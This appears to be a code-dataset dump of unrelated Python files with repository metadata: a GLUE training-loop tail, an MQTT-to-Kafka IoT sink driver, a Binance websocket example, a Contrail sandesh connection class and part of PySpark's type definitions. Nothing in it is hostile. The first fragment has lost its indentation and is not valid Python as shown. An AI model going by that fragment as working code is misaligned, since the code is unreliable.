if isinstance(checkpointing_steps, int):
if completed_steps % checkpointing_steps == 0:
output_dir = f"step_{completed_steps }"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.save_state(output_dir)
if completed_steps >= args.max_train_steps:
break
model.eval()
samples_seen = 0
for step, batch in enumerate(eval_dataloader):
with torch.no_grad():
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1) if not is_regression else outputs.logits.squeeze()
predictions, references = accelerator.gather((predictions, batch["labels"]))
# If we are in a multiprocess environment, the last batch has duplicates
if accelerator.num_processes > 1:
if step == len(eval_dataloader) - 1:
predictions = predictions[: len(eval_dataloader.dataset) - samples_seen]
references = references[: len(eval_dataloader.dataset) - samples_seen]
else:
samples_seen += references.shape[0]
metric.add_batch(
predictions=predictions,
references=references,
)
eval_metric = metric.compute()
logger.info(f"epoch {epoch}: {eval_metric}")
if args.with_tracking:
accelerator.log(
{
"accuracy" if args.task_name is not None else "glue": eval_metric,
"train_loss": total_loss.item() / len(train_dataloader),
"epoch": epoch,
"step": completed_steps,
},
step=completed_steps,
)
if args.push_to_hub and epoch < args.num_train_epochs - 1:
accelerator.wait_for_everyone()
unwrapped_model = accelerator.unwrap_model(model)
unwrapped_model.save_pretrained(
args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save
)
if accelerator.is_main_process:
tokenizer.save_pretrained(args.output_dir)
repo.push_to_hub(
commit_message=f"Training in progress epoch {epoch}", blocking=False, auto_lfs_prune=True
)
if args.checkpointing_steps == "epoch":
output_dir = f"epoch_{epoch}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.save_state(output_dir)
if args.output_dir is not None:
accelerator.wait_for_everyone()
unwrapped_model = accelerator.unwrap_model(model)
unwrapped_model.save_pretrained(
args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save
)
if accelerator.is_main_process:
tokenizer.save_pretrained(args.output_dir)
if args.push_to_hub:
repo.push_to_hub(commit_message="End of training", auto_lfs_prune=True)
if args.task_name == "mnli":
# Final evaluation on mismatched validation set
eval_dataset = processed_datasets["validation_mismatched"]
eval_dataloader = DataLoader(
eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size
)
eval_dataloader = accelerator.prepare(eval_dataloader)
model.eval()
for step, batch in enumerate(eval_dataloader):
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1)
metric.add_batch(
predictions=accelerator.gather(predictions),
references=accelerator.gather(batch["labels"]),
)
eval_metric = metric.compute()
logger.info(f"mnli-mm: {eval_metric}")
if args.output_dir is not None:
with open(os.path.join(args.output_dir, "all_results.json"), "w") as f:
json.dump({"eval_accuracy": eval_metric["accuracy"]}, f)
if __name__ == "__main__":
main()
| 44.129747
| 119
| 0.660559
|
4a022e2347e488268eb133457af3b0e0c12d7650
| 5,795
|
py
|
Python
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 2
|
2020-11-18T05:16:38.000Z
|
2021-07-06T08:47:27.000Z
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 4
|
2020-09-11T05:38:14.000Z
|
2020-11-04T07:04:41.000Z
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 2
|
2021-01-07T14:42:30.000Z
|
2021-07-23T02:49:12.000Z
|
import ast
import datetime
import json
import time
import threading
import socket
import paho.mqtt.client as mqtt
from flask import Flask
from flask import request
from kafka import KafkaProducer
from message.mqtt_message import MqttMessages
from .healthcheck import HealthCheck
from .actuator import Actuator
from .http_codes import http_response_code
from .setup import args
def on_connect(client, userdata, flags, rc):
    # paho-mqtt connect callback (registered in mqtt_run); rc carries the
    # broker's connection result code.
    print("connected to mqtt broker")
def on_subscribe():
    # NOTE(review): never registered with the client, and the signature does
    # not match paho's on_subscribe(client, userdata, mid, granted_qos) —
    # confirm whether this callback is still needed.
    print('subscribed')
def on_message(client, userdata, message):
    # Generic message callback; its registration is commented out in
    # mqtt_run, so topic-specific callbacks handle messages instead.
    print('messaging')
# give message to kafka as kafka producer
def send_message_to_kafka(msg):
    """Forward one MQTT data message to the "sensor-data" Kafka topic.

    From the visible indexing, v_topic[1] appears to be the node id and
    payload[0] the sensor id — TODO confirm against the publisher's topic
    layout.
    """
    v_topic = msg.topic.split('/')
    payload = msg.payload.decode().split(',')
    kafka_message = topic_manager.kafka_message(v_topic, payload)
    # Register the node and its sensor so later lookups see them.
    topic_manager.add_node(int(v_topic[1]))
    topic_manager.add_sensor(int(v_topic[1]), int(payload[0]))
    #if topic_manager.sensor_check(v_topic[1], payload):
    if len(topic_manager.get_nodes()) > 0:
        '''
        if health_check.get_health_check_mode():
            if(health_check.set_node_state(v_topic[1], True)):
                print("health check: ", v_topic[1], "->True")
            else:
                print("This node is not healthcheck target: ",v_topic[1])
        '''
        print("data by mqtt: sending message to kafka : %s" % msg)
        print(kafka_message)
        # Synchronous flush per message: simple, but blocks the MQTT
        # callback thread until the send completes.
        producer.send("sensor-data", kafka_message)
        producer.flush()
def handle_uplink_command(msg):
    """Handle an uplink MAC-command message from a node.

    Only DevStatusAns is acted on: it marks the node alive in the health
    checker together with its reported battery level.
    """
    v_topic = msg.topic.split('/')  #command / uplink / MacCommand / nodeid
    if v_topic[2] == 'DevStatusAns':
        print('Received DevStatusAns!')
        json_msg = json.loads(str(msg.payload.decode()))
        health_check.set_node_state(v_topic[3], True, json_msg['battery'])
# callbacks
def data_callback(client, userdata, msg):
    # paho callback for "data/#": forward sensor readings to Kafka.
    return send_message_to_kafka(msg)
def command_callback(client, userdata, msg):
    # paho callback for "command/uplink/#": route MAC-command replies.
    return handle_uplink_command(msg)
# connecting mqtt client to mqtt broker
def mqtt_run(port=1883):
    """Connect the module-level MQTT client to the broker and subscribe.

    Registers the connect/disconnect handlers and the topic-specific
    callbacks for sensor data ("data/#") and uplink MAC commands
    ("command/uplink/#"), then starts paho's background network loop.

    :param port: broker TCP port (default 1883, the standard MQTT port);
        previously hard-coded, now parameterized for non-default brokers.
    :return: the canned HTTP 200 response tuple (kept for compatibility
        with the original interface).
    """
    client.on_connect = on_connect
    #client.on_message = on_message
    client.on_disconnect = on_disconnect
    client.message_callback_add("data/#", data_callback)
    client.message_callback_add("command/uplink/#", command_callback)
    # args.b is the broker host from the command line.
    client.connect(args.b, port)
    client.loop_start()
    client.subscribe("data/#")
    client.subscribe("command/uplink/#")
    return http_response_code['success200']
def on_disconnect(client, user_data, rc):
    # NOTE(review): calling client.disconnect() inside on_disconnect turns
    # any broker drop into a permanent disconnect (no automatic
    # reconnect) — confirm this is intended.
    print("Disconnected")
    client.disconnect()
def health_check_handler():
    """Background thread: periodically report node health to the server.

    Each cycle (only while health-check mode is enabled): connect to the
    health-check server over TCP, request device status from the target
    nodes via MQTT, wait one health-check interval for their answers, then
    push the aggregated JSON report.

    Fixes over the original: the TCP socket is now always closed (it was
    leaked every iteration), and the loop no longer busy-spins when
    health-check mode is disabled.
    """
    while True:
        if not health_check.get_health_check_mode():
            # Idle politely instead of burning CPU while disabled.
            time.sleep(1)
            continue
        healthcheck_server = '10.5.110.11'  #'220.70.2.5'
        healthcheck_port = 8085
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            print('Connect to HealthCheck Server...')
            # NOTE: a connection failure still terminates the thread, as in
            # the original implementation.
            client_socket.connect((healthcheck_server, healthcheck_port))
            print("Connected to HealthCheck...")
            print("healthcheck target: ", topic_manager.get_nodes())
            health_check.setup_target_nodelist(topic_manager.get_nodes())
            # Request device status over MQTT (the global MQTT client,
            # not the TCP socket).
            health_check.send_req(client)
            # Give the nodes one interval to answer before reporting.
            time.sleep(health_check.get_time())
            print("health_check: Send Json to HealthCheck Server...")
            client_socket.sendall(health_check.create_msg())
        finally:
            # Previously leaked: one open socket per iteration.
            client_socket.close()
# start the node webserver
app = Flask(__name__)
# Kafka producer aimed at the broker host given on the command line
# (args.k); values are JSON-serialized before sending.
producer = KafkaProducer(bootstrap_servers=[args.k+':9092'], api_version=(0,10,2,0), value_serializer=lambda v: json.dumps(v).encode('utf-8'))
topic_manager = MqttMessages()
client = mqtt.Client()
app.debug = False
#app.threaded = True
health_check = HealthCheck()
actuator = Actuator()
# Connect the MQTT client to the broker and subscribe to data/command
# topics (module import has side effects by design).
mqtt_run()
# create socket and run health_check thread
health_check.set_health_check_mode(True)
th = threading.Thread(target=health_check_handler, args=())
th.start()
# setting interval of the health check time
# setting interval of the health check time
@app.route('/health-check/set_time/<interval>', methods=['GET'])
def health_check_set_time(interval):
    """Set the health-check interval from the URL path segment.

    Bug fixed: the original view function took no argument, so Flask
    raised a TypeError on every request (the route declares a URL
    variable), and the body passed the imported ``time`` *module* to
    ``set_time`` instead of the requested value. The URL variable is
    renamed to ``interval`` to avoid shadowing the ``time`` module; the
    URL pattern matched by clients is unchanged.
    """
    health_check.set_time(interval)
    return http_response_code['success200']
# interval of the health check time
# interval of the health check time
@app.route('/health-check/time', methods=['GET'])
def health_check_get_time():
    # NOTE(review): the fetched interval is discarded — the endpoint only
    # returns the generic success response. Confirm whether the value
    # should be included in the reply body.
    health_check.get_time()
    return http_response_code['success200']
# make the format of the topics from the data which toiot server gave
# make the format of the topics from the data which toiot server gave
@app.route('/topics', methods=['POST'])
def response_getMessageFormat():
    """Rebuild the MQTT topic list from the JSON body posted by the toiot
    server, then subscribe the MQTT client to the resulting topics."""
    topic_manager.clear_topics()
    temp = json.loads(request.get_data().decode())
    topic_manager.get_message_format(temp)
    client.subscribe(topic_manager.mqtt_topic)
    print(topic_manager.mqtt_topic)
    return http_response_code['success200']
# delete sensor
# delete sensor
@app.route('/sensor/<node>/<sensor>', methods=['GET', 'DELETE'])
def delete_sensor(node, sensor):
    """Unsubscribe the MQTT topic of a single sensor.

    Bug fixed: the route declares both ``<node>`` and ``<sensor>`` URL
    variables, but the original view only accepted ``sensor``, so Flask
    raised a TypeError on every request. ``node`` is accepted (and
    currently unused) because the topic lookup only needs the sensor id.
    """
    client.unsubscribe(topic_manager.get_delete_sensor(sensor))
    return http_response_code['success200']
# delete arduino board
# delete arduino board
@app.route('/node/<node>', methods=['GET', 'DELETE'])
def delete_node(node):
    """Unsubscribe every MQTT topic belonging to *node*."""
    topic = topic_manager.get_delete_node(node)
    client.unsubscribe(topic)
    return http_response_code['success200']
# handle actuator
# handle actuator
@app.route('/actuator', methods=['GET', 'POST'])
def actuator_command():
    # Forward the JSON command body (None when absent/invalid, because of
    # silent=True) to the actuator over the MQTT client.
    json_data = request.get_json(silent=True)
    actuator.send_req(client, json_data)
    return http_response_code['success200']
# error handlers
@app.errorhandler(400)
def page_bad_request(error):
    # Canned response body for HTTP 400 (bad request).
    return http_response_code['error400']
@app.errorhandler(401)
def page_unauthorized(error):
    # Canned response body for HTTP 401 (unauthorized).
    return http_response_code['error401']
@app.errorhandler(403)
def page_forbidden(error):
    # Canned response body for HTTP 403 (forbidden).
    return http_response_code['error403']
@app.errorhandler(404)
def page_not_found(error):
    # Canned response body for HTTP 404 (not found).
    return http_response_code['error404']
@app.errorhandler(408)
def page_timeout(error):
    # Canned response body for HTTP 408 (request timeout).
    return http_response_code['error408']
| 30.824468
| 142
| 0.714927
|
4a022e72f965682bb57ab4f1f81d72bc1e626844
| 489
|
py
|
Python
|
examples/websocket/delivery/index_price.py
|
AlfonsoAgAr/binance-futures-connector-python
|
f0bd2c7b0576503bf526ce6be329ca2dae90fefe
|
[
"MIT"
] | 58
|
2021-11-22T11:46:27.000Z
|
2022-03-30T06:58:53.000Z
|
examples/websocket/delivery/index_price.py
|
sanjeevan121/binance-futures-connector-python
|
d820b73a15e9f64c80891a13694ca0c5d1693b90
|
[
"MIT"
] | 15
|
2021-12-15T22:40:52.000Z
|
2022-03-29T22:08:31.000Z
|
examples/websocket/delivery/index_price.py
|
sanjeevan121/binance-futures-connector-python
|
d820b73a15e9f64c80891a13694ca0c5d1693b90
|
[
"MIT"
] | 28
|
2021-12-10T03:56:13.000Z
|
2022-03-25T22:23:44.000Z
|
#!/usr/bin/env python
# Example script: subscribe to the coin-margined (delivery) futures
# index-price websocket stream and print updates for ~10 seconds.
import time
import logging
from binance.lib.utils import config_logging
from binance.websocket.delivery.websocket_client import DeliveryWebsocketClient as Client

config_logging(logging, logging.DEBUG)


def message_handler(message):
    # Invoked by the websocket client for every received payload.
    print(message)


my_client = Client()
my_client.start()

# Subscribe to the BTCUSD index-price stream (speed=1 selects the
# 1-second update variant — see the Binance stream docs).
my_client.index_price(
    pair="BTCUSD",
    speed = 1,
    id=1,
    callback=message_handler,
)

# Let the stream run briefly, then close the connection.
time.sleep(10)
logging.debug("closing ws connection")
my_client.stop()
| 17.464286
| 89
| 0.764826
|
4a02303bd41d0dfab71393f3d0265282e22ab486
| 7,552
|
py
|
Python
|
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
library/python/pysandesh/sandesh_connection.py
|
rombie/contrail-sandesh
|
c2e2d7a0a6b2e3a3ace26b612628aaca256e3a38
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# Sandesh Connection
#
import gevent
import os
from transport import TTransport
from protocol import TXMLProtocol
from sandesh_session import SandeshSession, SandeshReader
from sandesh_state_machine import SandeshStateMachine, Event
from sandesh_uve import SandeshUVETypeMaps
from gen_py.sandesh.ttypes import SandeshRxDropReason
from gen_py.sandesh.constants import *
class SandeshConnection(object):
    """Client-side connection to a sandesh Collector.

    Owns the connection state machine and tracks the configured
    primary/secondary collector addresses; when no primary collector is
    statically configured, collector addresses come from the discovery
    service instead.
    """

    def __init__(self, sandesh_instance, client, primary_collector,
                 secondary_collector, discovery_client):
        self._sandesh_instance = sandesh_instance
        self._logger = sandesh_instance.logger()
        self._client = client
        self._primary_collector = primary_collector
        self._secondary_collector = secondary_collector
        # Collector name. Updated upon receiving the control message
        # from the Collector during connection negotiation.
        self._collector = None
        self._admin_down = False
        self._state_machine = SandeshStateMachine(self, self._logger,
                                                  primary_collector,
                                                  secondary_collector)
        self._state_machine.initialize()
        # Local import defers the sandesh_common dependency until a
        # connection object is actually created.
        from sandesh_common.vns.constants import \
            COLLECTOR_DISCOVERY_SERVICE_NAME
        # No static primary collector -> discover collectors dynamically;
        # the subscription asks for 2 instances (primary + secondary).
        if primary_collector is None and discovery_client is not None:
            discovery_client.subscribe(COLLECTOR_DISCOVERY_SERVICE_NAME, 2,
                                       self._handle_collector_update)
    #end __init__

    # Public methods

    def session(self):
        # The state machine's current session object.
        return self._state_machine.session()
    #end session

    def statemachine(self):
        return self._state_machine
    #end statemachine

    def sandesh_instance(self):
        return self._sandesh_instance
    #end sandesh_instance

    def server(self):
        # Address of the collector the state machine is currently using.
        return self._state_machine.active_collector()
    #end server

    def primary_collector(self):
        return self._primary_collector
    #end primary_collector

    def secondary_collector(self):
        return self._secondary_collector
    #end secondary_collector

    def collector(self):
        # Collector name learned during negotiation (None until then).
        return self._collector
    #end collector

    def set_collector(self, collector):
        self._collector = collector
    #end set_collector

    def reset_collector(self):
        self._collector = None
    #end reset_collector

    def state(self):
        return self._state_machine.state()
    #end state

    def handle_initialized(self, count):
        # Send the control handshake (SandeshCtrlClientToServer) to the
        # Collector, advertising identity, pid and all known UVE type
        # names. `count` is forwarded as-is — presumably the connect
        # attempt count; confirm with the state-machine caller.
        uve_types = []
        uve_global_map = self._sandesh_instance._uve_type_maps.get_uve_global_map()
        # NOTE: iterkeys() is Python-2-only.
        for uve_type_key in uve_global_map.iterkeys():
            uve_types.append(uve_type_key)
        from gen_py.sandesh_ctrl.ttypes import SandeshCtrlClientToServer
        ctrl_msg = SandeshCtrlClientToServer(self._sandesh_instance.source_id(),
            self._sandesh_instance.module(), count, uve_types, os.getpid(), 0,
            self._sandesh_instance.node_type(),
            self._sandesh_instance.instance_id())
        self._logger.debug('Send sandesh control message. uve type count # %d' % (len(uve_types)))
        ctrl_msg.request('ctrl', sandesh=self._sandesh_instance)
    #end handle_initialized

    def handle_sandesh_ctrl_msg(self, ctrl_msg):
        # Delegate an incoming control message to the sandesh client.
        self._client.handle_sandesh_ctrl_msg(ctrl_msg)
    #end handle_sandesh_ctrl_msg

    def handle_sandesh_uve_msg(self, uve_msg):
        # Queue an outgoing UVE message on the client.
        self._client.send_sandesh(uve_msg)
    #end handle_sandesh_uve_msg

    def set_admin_state(self, down):
        # Propagate admin up/down transitions to the state machine only
        # on an actual change.
        if self._admin_down != down:
            self._admin_down = down
            self._state_machine.set_admin_state(down)
    #end set_admin_state

    # Private methods

    def _handle_collector_update(self, collector_info):
        # Discovery-service callback: refresh the primary/secondary
        # collector addresses and notify the state machine if either
        # changed. collector_info is a list of dicts with 'ip-address'
        # and 'port' keys (strings, judging from the concatenation).
        if collector_info is not None:
            self._logger.info('Received discovery update %s for collector service' \
                % (str(collector_info)))
            old_primary_collector = self._primary_collector
            old_secondary_collector = self._secondary_collector
            if len(collector_info) > 0:
                try:
                    self._primary_collector = collector_info[0]['ip-address'] \
                        + ':' + collector_info[0]['port']
                except KeyError:
                    self._logger.error('Failed to decode collector info from the discovery service')
                    return
            else:
                self._primary_collector = None
            if len(collector_info) > 1:
                try:
                    self._secondary_collector = collector_info[1]['ip-address'] \
                        + ':' + collector_info[1]['port']
                except KeyError:
                    self._logger.error('Failed to decode collector info from the discovery service')
                    return
            else:
                self._secondary_collector = None
            if (old_primary_collector != self._primary_collector) or \
               (old_secondary_collector != self._secondary_collector):
                self._state_machine.enqueue_event(Event(
                    event = Event._EV_COLLECTOR_CHANGE,
                    primary_collector = self._primary_collector,
                    secondary_collector = self._secondary_collector))
    #end _handle_collector_update

    def _receive_sandesh_msg(self, session, msg):
        # Demultiplex a received message: control messages (flagged by
        # SANDESH_CONTROL_HINT in the header) are decoded here and fed to
        # the state machine; everything else goes to the client. Drops
        # are accounted in msg_stats with a reason code.
        (hdr, hdr_len, sandesh_name) = SandeshReader.extract_sandesh_header(msg)
        if sandesh_name is None:
            self._sandesh_instance.msg_stats().update_rx_stats('__UNKNOWN__',
                len(msg), SandeshRxDropReason.DecodingFailed)
            self._logger.error('Failed to decode sandesh header for "%s"' % (msg))
            return
        if hdr.Hints & SANDESH_CONTROL_HINT:
            self._logger.debug('Received sandesh control message [%s]' % (sandesh_name))
            if sandesh_name != 'SandeshCtrlServerToClient':
                self._sandesh_instance.msg_stats().update_rx_stats(
                    sandesh_name, len(msg),
                    SandeshRxDropReason.ControlMsgFailed)
                self._logger.error('Invalid sandesh control message [%s]' % (sandesh_name))
                return
            # Decode the XML-encoded control payload following the header.
            transport = TTransport.TMemoryBuffer(msg[hdr_len:])
            protocol_factory = TXMLProtocol.TXMLProtocolFactory()
            protocol = protocol_factory.getProtocol(transport)
            from gen_py.sandesh_ctrl.ttypes import SandeshCtrlServerToClient
            sandesh_ctrl_msg = SandeshCtrlServerToClient()
            if sandesh_ctrl_msg.read(protocol) == -1:
                self._sandesh_instance.msg_stats().update_rx_stats(
                    sandesh_name, len(msg),
                    SandeshRxDropReason.DecodingFailed)
                self._logger.error('Failed to decode sandesh control message "%s"' %(msg))
            else:
                self._sandesh_instance.msg_stats().update_rx_stats(
                    sandesh_name, len(msg))
                self._state_machine.on_sandesh_ctrl_msg_receive(session, sandesh_ctrl_msg,
                    hdr.Source)
        else:
            self._logger.debug('Received sandesh message [%s]' % (sandesh_name))
            self._client.handle_sandesh_msg(sandesh_name,
                msg[hdr_len:], len(msg))
    #end _receive_sandesh_msg
#end class SandeshConnection
| 41.043478
| 100
| 0.637579
|
4a023123b6ecaf6b93b66d41a0626cf376b63156
| 51,697
|
py
|
Python
|
python/pyspark/sql/types.py
|
fusons/spark
|
39e2bad6a866d27c3ca594d15e574a1da3ee84cc
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 147
|
2017-11-22T09:18:46.000Z
|
2021-11-18T03:47:27.000Z
|
python/pyspark/sql/types.py
|
fusons/spark
|
39e2bad6a866d27c3ca594d15e574a1da3ee84cc
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 95
|
2016-08-29T09:00:58.000Z
|
2020-03-30T11:23:50.000Z
|
python/pyspark/sql/types.py
|
zhaolj66/spark-parent_2.11
|
10ac1f16d34cfbfad52758acadfa9af4907ba3a0
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 32
|
2017-11-23T00:21:26.000Z
|
2021-06-15T15:30:31.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import decimal
import time
import datetime
import calendar
import json
import re
import base64
from array import array
if sys.version >= "3":
long = int
basestring = unicode = str
from py4j.protocol import register_input_converter
from py4j.java_gateway import JavaClass
from pyspark.serializers import CloudPickleSerializer
# Public API of this module for ``from pyspark.sql.types import *``.
__all__ = [
    "DataType", "NullType", "StringType", "BinaryType", "BooleanType", "DateType",
    "TimestampType", "DecimalType", "DoubleType", "FloatType", "ByteType", "IntegerType",
    "LongType", "ShortType", "ArrayType", "MapType", "StructField", "StructType"]
class DataType(object):
    """Base class for all Spark SQL data types.

    Equality is structural (same class, same attributes); ``typeName`` is
    derived from the class name.
    """

    def __repr__(self):
        return type(self).__name__

    def __hash__(self):
        return hash(str(self))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)

    @classmethod
    def typeName(cls):
        # Class name minus the trailing "Type", lowercased.
        return cls.__name__[:-4].lower()

    def simpleString(self):
        return self.typeName()

    def jsonValue(self):
        return self.typeName()

    def json(self):
        value = self.jsonValue()
        return json.dumps(value, separators=(',', ':'), sort_keys=True)

    def needConversion(self):
        """Whether values of this type need conversion between the Python
        object and the internal SQL object.

        False by default; complex types (arrays, maps, structs) override
        this to avoid unnecessary conversions.
        """
        return False

    def toInternal(self, obj):
        """Convert a Python object into an internal SQL object."""
        return obj

    def fromInternal(self, obj):
        """Convert an internal SQL object into a native Python object."""
        return obj
# This singleton pattern does not work with pickle, you will get
# another object after pickle and unpickle
class DataTypeSingleton(type):
    """Metaclass that makes each using class a singleton: every call of
    the class returns the same cached instance."""

    _instances = {}

    def __call__(cls):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super(DataTypeSingleton, cls).__call__()
            cls._instances[cls] = instance
            return instance
class NullType(DataType):
    """Null type.

    The data type representing None, used for the types that cannot be inferred.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; a plain (inert) attribute on Py3
class AtomicType(DataType):
    """An internal type used to represent everything that is not
    null, UDTs, arrays, structs, and maps."""
class NumericType(AtomicType):
    """Numeric data types.

    Common base for integral and fractional types.
    """
class IntegralType(NumericType):
    """Integral data types.

    Base for Byte/Short/Integer/LongType.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class FractionalType(NumericType):
    """Fractional data types.

    Base for Float/Double/DecimalType.
    """
class StringType(AtomicType):
    """String data type.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class BinaryType(AtomicType):
    """Binary (byte array) data type.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class BooleanType(AtomicType):
    """Boolean data type.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class DateType(AtomicType):
    """Date (datetime.date) data type.

    Represented internally as the number of days since the Unix epoch
    (1970-01-01); ``None`` passes through unchanged (SQL NULL).
    """

    __metaclass__ = DataTypeSingleton

    EPOCH_ORDINAL = datetime.datetime(1970, 1, 1).toordinal()

    def needConversion(self):
        # Dates are stored as an int day offset, so conversion is needed.
        return True

    def toInternal(self, d):
        return None if d is None else d.toordinal() - self.EPOCH_ORDINAL

    def fromInternal(self, v):
        return None if v is None else datetime.date.fromordinal(v + self.EPOCH_ORDINAL)
class TimestampType(AtomicType):
    """Timestamp (datetime.datetime) data type.

    Represented internally as microseconds since the Unix epoch.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3

    def needConversion(self):
        return True

    def toInternal(self, dt):
        # None passes through (implicit return). Aware datetimes use their
        # UTC time tuple; naive ones are interpreted in the local timezone
        # via mktime.
        if dt is not None:
            seconds = (calendar.timegm(dt.utctimetuple()) if dt.tzinfo
                       else time.mktime(dt.timetuple()))
            return int(seconds) * 1000000 + dt.microsecond

    def fromInternal(self, ts):
        if ts is not None:
            # using int to avoid precision loss in float
            return datetime.datetime.fromtimestamp(ts // 1000000).replace(microsecond=ts % 1000000)
class DecimalType(FractionalType):
    """Decimal (decimal.Decimal) data type.

    A fixed-precision decimal: ``precision`` is the maximum total number
    of digits (up to 38) and ``scale`` the number of digits to the right
    of the dot (must be <= precision). For example, (5, 2) can hold
    values in [-999.99, 999.99]. Defaults to (10, 0); schemas inferred
    from decimal.Decimal objects use (38, 18).

    :param precision: the maximum total number of digits (default: 10)
    :param scale: the number of digits on right side of dot. (default: 0)
    """

    def __init__(self, precision=10, scale=0):
        self.precision = precision
        self.scale = scale
        self.hasPrecisionInfo = True  # this is public API

    def simpleString(self):
        return "decimal(%d,%d)" % (self.precision, self.scale)

    def jsonValue(self):
        # The JSON form is identical to the simple-string form.
        return self.simpleString()

    def __repr__(self):
        return "DecimalType(%d,%d)" % (self.precision, self.scale)
class DoubleType(FractionalType):
    """Double data type, representing double precision floats.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class FloatType(FractionalType):
    """Float data type, representing single precision floats.
    """

    __metaclass__ = DataTypeSingleton  # Py2 singleton hook; inert on Py3
class ByteType(IntegralType):
    """Byte data type, i.e. a signed integer in a single byte.
    """

    def simpleString(self):
        # SQL name for this type.
        return 'tinyint'
class IntegerType(IntegralType):
    """Int data type, i.e. a signed 32-bit integer.
    """

    def simpleString(self):
        # SQL name for this type.
        return 'int'
class LongType(IntegralType):
    """Long data type, i.e. a signed 64-bit integer.

    If the values are beyond the range of [-9223372036854775808, 9223372036854775807],
    please use :class:`DecimalType`.
    """

    def simpleString(self):
        # SQL name for this type.
        return 'bigint'
class ShortType(IntegralType):
    """Short data type, i.e. a signed 16-bit integer.
    """

    def simpleString(self):
        # SQL name for this type.
        return 'smallint'
class ArrayType(DataType):
    """Array data type.

    :param elementType: :class:`DataType` of each element in the array.
    :param containsNull: boolean, whether the array can contain null (None) values.
    """

    def __init__(self, elementType, containsNull=True):
        """
        >>> ArrayType(StringType()) == ArrayType(StringType(), True)
        True
        >>> ArrayType(StringType(), False) == ArrayType(StringType())
        False
        """
        assert isinstance(elementType, DataType), "elementType should be DataType"
        self.elementType = elementType
        self.containsNull = containsNull

    def simpleString(self):
        return 'array<' + self.elementType.simpleString() + '>'

    def __repr__(self):
        nullable = str(self.containsNull).lower()
        return "ArrayType(%s,%s)" % (self.elementType, nullable)

    def jsonValue(self):
        return {
            "type": self.typeName(),
            "elementType": self.elementType.jsonValue(),
            "containsNull": self.containsNull,
        }

    @classmethod
    def fromJson(cls, json):
        # Note: the parameter shadows the json module by original design.
        element = _parse_datatype_json_value(json["elementType"])
        return ArrayType(element, json["containsNull"])

    def needConversion(self):
        # An array needs conversion exactly when its elements do.
        return self.elementType.needConversion()

    def toInternal(self, obj):
        if not self.needConversion():
            return obj
        if not obj:
            # Preserve None (and other falsy values) unchanged.
            return obj
        return [self.elementType.toInternal(v) for v in obj]

    def fromInternal(self, obj):
        if not self.needConversion():
            return obj
        if not obj:
            return obj
        return [self.elementType.fromInternal(v) for v in obj]
class MapType(DataType):
    """Map data type.

    :param keyType: :class:`DataType` of the keys in the map.
    :param valueType: :class:`DataType` of the values in the map.
    :param valueContainsNull: indicates whether values can contain null (None) values.

    Keys in a map data type are not allowed to be null (None).
    """

    def __init__(self, keyType, valueType, valueContainsNull=True):
        """
        >>> (MapType(StringType(), IntegerType())
        ...  == MapType(StringType(), IntegerType(), True))
        True
        >>> (MapType(StringType(), IntegerType(), False)
        ...  == MapType(StringType(), FloatType()))
        False
        """
        assert isinstance(keyType, DataType), "keyType should be DataType"
        assert isinstance(valueType, DataType), "valueType should be DataType"
        self.keyType = keyType
        self.valueType = valueType
        self.valueContainsNull = valueContainsNull

